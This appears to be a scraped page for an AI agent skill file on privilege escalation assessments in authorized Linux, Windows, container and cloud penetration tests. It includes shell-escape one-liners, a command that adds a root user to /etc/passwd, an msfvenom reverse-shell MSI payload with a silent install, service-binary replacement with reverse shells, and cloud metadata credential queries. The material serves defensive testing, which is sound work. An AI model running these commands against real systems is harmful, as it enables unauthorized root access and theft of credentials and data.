Anthropic-Cybersecurity-Skills performing-privilege-escalation-assessment
'Performs privilege escalation assessments on compromised Linux and Windows systems to identify paths from low-privilege
install
source · Clone the upstream repo
git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/performing-privilege-escalation-assessment" ~/.claude/skills/mukul975-anthropic-cybersecurity-skills-performing-privilege-escalation-assessme && rm -rf "$T"
manifest:
skills/performing-privilege-escalation-assessment/SKILL.mdsource content
Performing Privilege Escalation Assessment
When to Use
- After gaining initial low-privilege access during a penetration test to demonstrate full system compromise
- Assessing the security hardening of Linux and Windows servers against local privilege escalation attacks
- Evaluating whether endpoint detection and response (EDR) tools detect common privilege escalation techniques
- Testing the effectiveness of least-privilege policies and application whitelisting on endpoints
- Validating that container breakout and VM escape controls are properly configured
Do not use without written authorization, against production systems where exploitation could cause downtime, or for deploying kernel exploits on systems without prior approval and rollback capability.
Prerequisites
- Low-privilege shell access (reverse shell, SSH, RDP) to the target system obtained through authorized means
- Privilege escalation enumeration scripts: linPEAS (Linux), winPEAS (Windows), Linux Smart Enumeration (LSE)
- Compiled kernel exploits for common CVEs or access to compilation tools on the target
- GTFOBins reference for Linux SUID/sudo binary abuse and LOLBAS reference for Windows living-off-the-land binaries
- Precompiled post-exploitation binaries for the target architecture if compilation is not available on the target
Workflow
Step 1: System Enumeration
Gather comprehensive information about the target system:
Linux Enumeration:
- Current user and group membershipsid && whoami
- Kernel version for kernel exploit identificationuname -a
- Distribution and versioncat /etc/os-release
- Commands the current user can run as root via sudosudo -l
- SUID binariesfind / -perm -4000 -type f 2>/dev/null
- SGID binariesfind / -perm -2000 -type f 2>/dev/null
- Scheduled tasks running as rootcrontab -l && ls -la /etc/cron*
- Processes running as rootps aux | grep root
- User accounts (look for additional users with UID 0)cat /etc/passwd
- World-writable directoriesfind / -writable -type d 2>/dev/null- Run
for automated comprehensive enumerationlinpeas.sh
Windows Enumeration:
- Current user privileges (look for SeImpersonatePrivilege, SeDebugPrivilege)whoami /priv
- OS version, hotfix level, architecturesysteminfo
- Unquoted service pathswmic service get name,pathname,startmode
- Writable directories in Program Filesicacls "C:\Program Files" /T
- AlwaysInstallElevated checkreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Stored Windows credentialscmdkey /list
- Scheduled tasks with their run-as accountsschtasks /query /fo LIST /v- Run
for automated comprehensive enumerationwinPEAS.exe
Step 2: Linux Privilege Escalation Vectors
Test identified escalation vectors systematically:
- Sudo misconfigurations: If
shows entries likesudo -l
, use GTFOBins to escalate:(ALL) NOPASSWD: /usr/bin/vim
to spawn a root shellsudo vim -c ':!/bin/bash'- Common dangerous sudo entries: vim, less, find, nmap, python, perl, ruby, awk, env
- SUID binary abuse: If a SUID binary is identified that allows arbitrary command execution, shell escape, or file read:
- Custom SUID: Check if a custom SUID binary calls other programs without absolute paths (PATH injection)
- Known SUID: Check GTFOBins for exploitation of standard SUID binaries
- Cron job exploitation: If a cron job runs a script writable by the current user, or runs a script from a writable directory:
- Modify the script to add a reverse shell or SUID copy of bash
- PATH-based cron exploitation: if the cron job calls a command without absolute path and PATH is writable
- Kernel exploits: Match the kernel version to known exploits:
- DirtyPipe (CVE-2022-0847): Linux kernel 5.8-5.16.11
- DirtyCow (CVE-2016-5195): Linux kernel 2.6.22-4.8.3
- PwnKit (CVE-2021-4034): Polkit pkexec vulnerability affecting most Linux distributions
- Capabilities abuse:
to find binaries with elevated capabilities (cap_setuid, cap_dac_override)getcap -r / 2>/dev/null - Writable /etc/passwd: If /etc/passwd is writable, add a new root user:
echo 'newroot:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd
Step 3: Windows Privilege Escalation Vectors
Test Windows-specific escalation paths:
- Token impersonation: If the user has
(common for service accounts and IIS):SeImpersonatePrivilege- Use
,JuicyPotato.exe
, orPrintSpoofer.exe
to impersonate SYSTEMGodPotato.exe
->PrintSpoofer.exe -i -c "cmd /c whoami"NT AUTHORITY\SYSTEM
- Use
- Unquoted service paths: If a service has an unquoted path with spaces (e.g.,
) and you can write to an intermediate directory:C:\Program Files\My App\service.exe- Place a malicious executable at
which will execute when the service restartsC:\Program Files\My.exe
- Place a malicious executable at
- Writable service binaries: If you can modify the executable of a service running as SYSTEM:
- Replace the binary with a reverse shell and restart the service
- AlwaysInstallElevated: If both HKLM and HKCU AlwaysInstallElevated registry keys are set to 1:
- Generate a malicious MSI:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi - Install with elevated privileges:
msiexec /quiet /qn /i shell.msi
- Generate a malicious MSI:
- Stored credentials: Check for credentials in
, AutoLogon registry keys, unattend.xml, web.config files, and PowerShell historycmdkey /list - DLL hijacking: Identify services that load DLLs from writable directories. Use Process Monitor to find missing DLL loads, then place a malicious DLL.
- Scheduled tasks: Find tasks running as SYSTEM with writable scripts or binaries
Step 4: Container and Cloud Escalation
Test for escalation paths in containerized and cloud environments:
- Docker breakout: Check if the container runs in privileged mode (
), has the Docker socket mounted (--privileged
), or has/var/run/docker.sock
capabilitySYS_ADMIN - Kubernetes pod escalation: Check for service account tokens with cluster-admin rights, hostPID/hostNetwork namespaces, or hostPath volume mounts
- Cloud metadata: Access cloud instance metadata from compromised hosts (
) to discover IAM roles, credentials, and instance informationhttp://169.254.169.254/latest/meta-data/ - IAM role abuse: If cloud credentials are discovered, enumerate IAM permissions and test for privilege escalation through IAM policy manipulation
Step 5: Documentation and Impact Assessment
Document the complete escalation path and business impact:
- Record every command executed during escalation with timestamps
- Capture proof of elevated access (whoami showing root/SYSTEM, accessing restricted files)
- Document what data or systems become accessible at the elevated privilege level
- Map the escalation technique to MITRE ATT&CK (T1548 - Abuse Elevation Control Mechanism, T1068 - Exploitation for Privilege Escalation)
- Provide specific remediation for each identified escalation vector
Key Concepts
| Term | Definition |
|---|---|
| SUID Binary | A Linux binary with the Set User ID bit enabled, which executes with the file owner's privileges (typically root) regardless of who runs it |
| SeImpersonatePrivilege | A Windows privilege that allows a process to impersonate another user's security token, commonly abused by service accounts to escalate to SYSTEM |
| Kernel Exploit | An exploit targeting a vulnerability in the operating system kernel to gain ring-0 or root/SYSTEM-level access |
| GTFOBins | A curated list of Unix binaries that can be exploited for privilege escalation, file read/write, or shell escape when misconfigured |
| LOLBAS | Living Off The Land Binaries and Scripts; legitimate Windows binaries that can be abused for code execution, file operations, or persistence |
| DLL Hijacking | Exploiting the DLL search order on Windows to load a malicious DLL by placing it in a directory searched before the legitimate DLL location |
| Token Impersonation | A Windows technique where a compromised process with appropriate privileges captures and uses another user's access token to execute commands as that user |
Tools & Systems
- linPEAS / winPEAS: Automated privilege escalation enumeration scripts that check hundreds of potential escalation vectors on Linux and Windows
- GTFOBins / LOLBAS: Reference databases of Unix binaries and Windows binaries that can be exploited for privilege escalation when misconfigured
- PrintSpoofer / GodPotato: Windows privilege escalation tools that exploit
to achieve SYSTEM-level access from service accountsSeImpersonatePrivilege - Linux Exploit Suggester: Script that compares the target kernel version against a database of known kernel exploits to identify applicable exploits
Common Scenarios
Scenario: Privilege Escalation on a Linux Web Server
Context: During a penetration test, the tester gained a low-privilege shell as
www-data on an Ubuntu 22.04 web server through a PHP file upload vulnerability. The goal is to escalate to root to demonstrate full server compromise.
Approach:
- Run
which identifies thatlinpeas.sh
can runwww-data
as root via sudo without a password/usr/bin/find - Verify with
:sudo -l(root) NOPASSWD: /usr/bin/find - Consult GTFOBins for the
sudo entry:findsudo find . -exec /bin/bash -p \; -quit - Execute the command and obtain a root shell
- As root, access
to extract password hashes, read database credentials from the application configuration, and access the MySQL database containing customer PII/etc/shadow - Document: initial access as www-data -> sudo misconfiguration -> root shell -> database access -> 75,000 customer records accessible
Pitfalls:
- Running kernel exploits without testing on a similar system first, risking a kernel panic and system crash
- Not checking for container environments where apparent root access may be limited to the container namespace
- Ignoring cloud metadata endpoints accessible from the compromised host that may yield IAM credentials
- Failing to enumerate capabilities and SUID binaries after checking sudo, missing alternative escalation paths
Output Format
## Finding: Sudo Misconfiguration Allowing Root Escalation via find **ID**: PRIV-001 **Severity**: Critical (CVSS 8.8) **Affected Host**: web-prod-01 (10.10.5.15) **OS**: Ubuntu 22.04 LTS **Initial Access**: www-data (via PHP file upload - WEB-004) **Escalation Technique**: MITRE ATT&CK T1548.003 - Sudo and Sudo Caching **Description**: The www-data user is configured in /etc/sudoers to execute /usr/bin/find as root without a password. The find command supports the -exec flag which can spawn a root shell, effectively granting www-data unrestricted root access. **Proof of Concept**: www-data@web-prod-01:~$ sudo -l (root) NOPASSWD: /usr/bin/find www-data@web-prod-01:~$ sudo find . -exec /bin/bash -p \; -quit root@web-prod-01:~# id uid=0(root) gid=0(root) groups=0(root) **Impact**: Full root access on the production web server. From root, the tester accessed database credentials in /var/www/app/.env, connected to MySQL, and confirmed read access to 75,000 customer records including names, emails, and addresses. **Remediation**: 1. Remove the /usr/bin/find sudo entry for www-data 2. If find access is required, restrict it to specific directories with --no-exec 3. Audit all sudo entries for binaries listed in GTFOBins 4. Implement sudo logging with auditd for all privileged command execution